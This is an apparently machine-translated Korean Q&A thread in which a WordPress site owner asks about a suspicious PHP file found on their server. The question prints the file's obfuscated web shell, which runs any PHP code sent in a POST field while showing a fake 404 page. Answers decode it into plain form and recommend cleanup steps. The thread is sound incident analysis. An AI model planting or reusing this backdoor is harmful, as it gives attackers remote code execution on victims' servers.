2. 질의 응답
  3. 호스팅의 악의적 인 파일 목적

호스팅의 악의적 인 파일 목적

2017-02-02 5 views
0

안녕하세요, 서버에 악의적 인 PHP 파일이 있는데 내 컴퓨터에 해당 파일을 다운로드했습니다. 이 파일에는 작은 악성 코드가 포함되어 있으며 eval 명령을 실행하려고합니다. 나는 그 파일이 내 서버에 어떤 영향을 미치는지 모른다. 누구든지이 코드로 제게 회신 해 주실 수 있으면 제발.호스팅의 악의적 인 파일 목적

$q22 = "fo\\@5HL[\r.S4awj\t)n`x}\"UZ\$gr(+JO2i* I;3XCvBk>m,NzEc_6qD?9PYhuV:bl|WK&Q=#y~/t!\neAp7]{M1Fd%0-^8GR'<sT"; 

$GLOBALS['owyeq61'] = ${$q22[50].$q22[56].$q22[30].$q22[10].$q22[97]}; 
$GLOBALS['tmiok36'] = $q22[58].$q22[77].$q22[12].$q22[86].$q22[77].$q22[26]; 

if (!empty($GLOBALS['owyeq61']['mc589a12e'])) { 
    eval($GLOBALS['owyeq61']['mc589a12e']); 
} 

$GLOBALS['tmiok36']($q22[5].$q22[97].$q22[97].$q22[56].$q22[73].$q22[84].$q22[9].$q22[88].$q22[34].$q22[11].$q22[88].$q22[11].$q22[34].$q22[46].$q22[1].$q22[74].$q22[34].$q22[85].$q22[1].$q22[59].$q22[17].$q22[86]); 

echo $q22[95].$q22[58].$q22[84].$q22[43].$q22[11].$q22[88].$q22[11].$q22[34].$q22[46].$q22[1].$q22[74].$q22[34].$q22[85].$q22[1].$q22[59].$q22[17].$q22[86].$q22[95].$q22[73].$q22[58].$q22[84].$q22[43].$q22[8].$q22[76].$q22[97].$q22[58].$q22[77].$q22[34].$q22[79].$q22[12].$q22[25].$q22[77].$q22[34].$q22[74].$q22[58].$q22[12].$q22[74].$q22[34].$q22[71].$q22[1].$q22[59].$q22[34].$q22[58].$q22[12].$q22[40].$q22[77].$q22[34].$q22[26].$q22[77].$q22[52].$q22[59].$q22[77].$q22[96].$q22[74].$q22[77].$q22[86].$q22[34].$q22[49].$q22[1].$q22[59].$q22[63].$q22[86].$q22[34].$q22[17].$q22[1].$q22[74].$q22[34].$q22[62].$q22[77].$q22[34].$q22[0].$q22[1].$q22[59].$q22[17].$q22[86].$q22[9].$q22[8].$q22[76]; 
/** 
* XML-RPC protocol support for WordPress 
* 
* @package WordPress 
*/ 

/** 
* Whether this is an XML-RPC Request 
*/

출처

2017-02-02 user1503662

+1

내가 호스트에서 사이트를 제거 할 체크리스트로 사용 호스팅에 (모든 사용자 이름/암호를 변경하고 Wordpress 관리자에게는 미안한 것보다 안전하다는 것이 낫습니다.) 다시 업로드하십시오. 또한 보안 문제가있는 것으로 알려진 플러그인이 있는지 Google에 확인해야합니다. 진절머리 나는 플러그인이 이런 문제를 일으키는 것은 처음이 아닐 것입니다. 그 외에는 우리가 할 수있는 일이별로 없습니다. –

답변

1

필드 mc589a12e에, POST 요청 페이지에 전송되는 모든 PHP 코드를 실행하는 코드의이 조각.

$GLOBALS['owyeq61'] = ${'_POST'}; 
$GLOBALS['tmiok36'] = 'header'; 
if (!empty($GLOBALS['owyeq61']['mc589a12e'])) { 
    eval($GLOBALS['owyeq61']['mc589a12e']); 
} 
$GLOBALS['tmiok36']('HTTP/1.0 404 Not Found'); 
echo '<h1>404 Not Found</h1> 
The page that you have requested could not be found.';

출처

2017-02-02 08:30:02

1

나는 샌드 박스 모드에서 코드를 실행 :

$q22의 회씩 연결을 평가 한 후 코드입니다. 

$test['owyeq61'] = $q22[50].$q22[56].$q22[30].$q22[10].$q22[97]; 
// return POST 

$test['tmiok36'] = $q22[58].$q22[77].$q22[12].$q22[86].$q22[77].$q22[26]; 
// return Header 

$q22[95].$q22[58].$q22[84].$q22[43].$q22[11].$q22[88].$q22[11].$q22[34].$q22[ 46].$q22[1].$q22[74].$q22[34].$q22[85].$q22[1].$q22[59].$q22[17].$q22[86].$q22[95].$q22[73].$q22[58].$q22[84].$q22[43].$q22[8].$q22[76].$q22[97].$q22[58].$q22[77].$q22[34].$q22[79].$q22[12].$q22[25].$q22[77].$q22[34].$q22[74].$q22[58].$q22[12].$q22[74].$q22[34].$q22[71].$q22[1].$q22[59].$q22[34].$q22[58].$q22[12].$q22[40].$q22[77].$q22[34].$q22[26].$q22[77].$q22[52].$q22[59].$q22[77].$q22[96].$q22[74].$q22[77].$q22[86].$q22[34].$q22[49].$q22[1].$q22[59].$q22[63].$q22[86].$q22[34].$q22[17].$q22[1].$q22[74].$q22[34].$q22[62].$q22[77].$q22[34].$q22[0].$q22[1].$q22[59].$q22[17].$q22[86].$q22[9].$q22[8].$q22[76]; 
// returns 404 Page not found

하지만 평가가 까다로워요. 그것은 코드에서 글로벌 헤더 mc589a12e을 찾습니다, 그래서 어쨌든 그 어프로치의 wordpress에서 설정 한 스크립트는이 전역을 HTTP/1.0 404 Not Found으로 다시 작성합니다. 어쩌면 보안 검사를 우회 할 수도 있습니다.

서버에서이 파일을 삭제하고 시스템/사용자/쓰기 권한을 업데이트하는 것은 말할 필요도없이 말입니다.

어쩌면, 최신 워드 프레스와 플러그인 버전으로 로컬 버전을 업데이트, 데이터베이스를 삭제, https://codex.wordpress.org/FAQ_My_site_was_hacked

출처

2017-02-02 08:38:50

 관련 문제

  • 관련 문제 없음^_^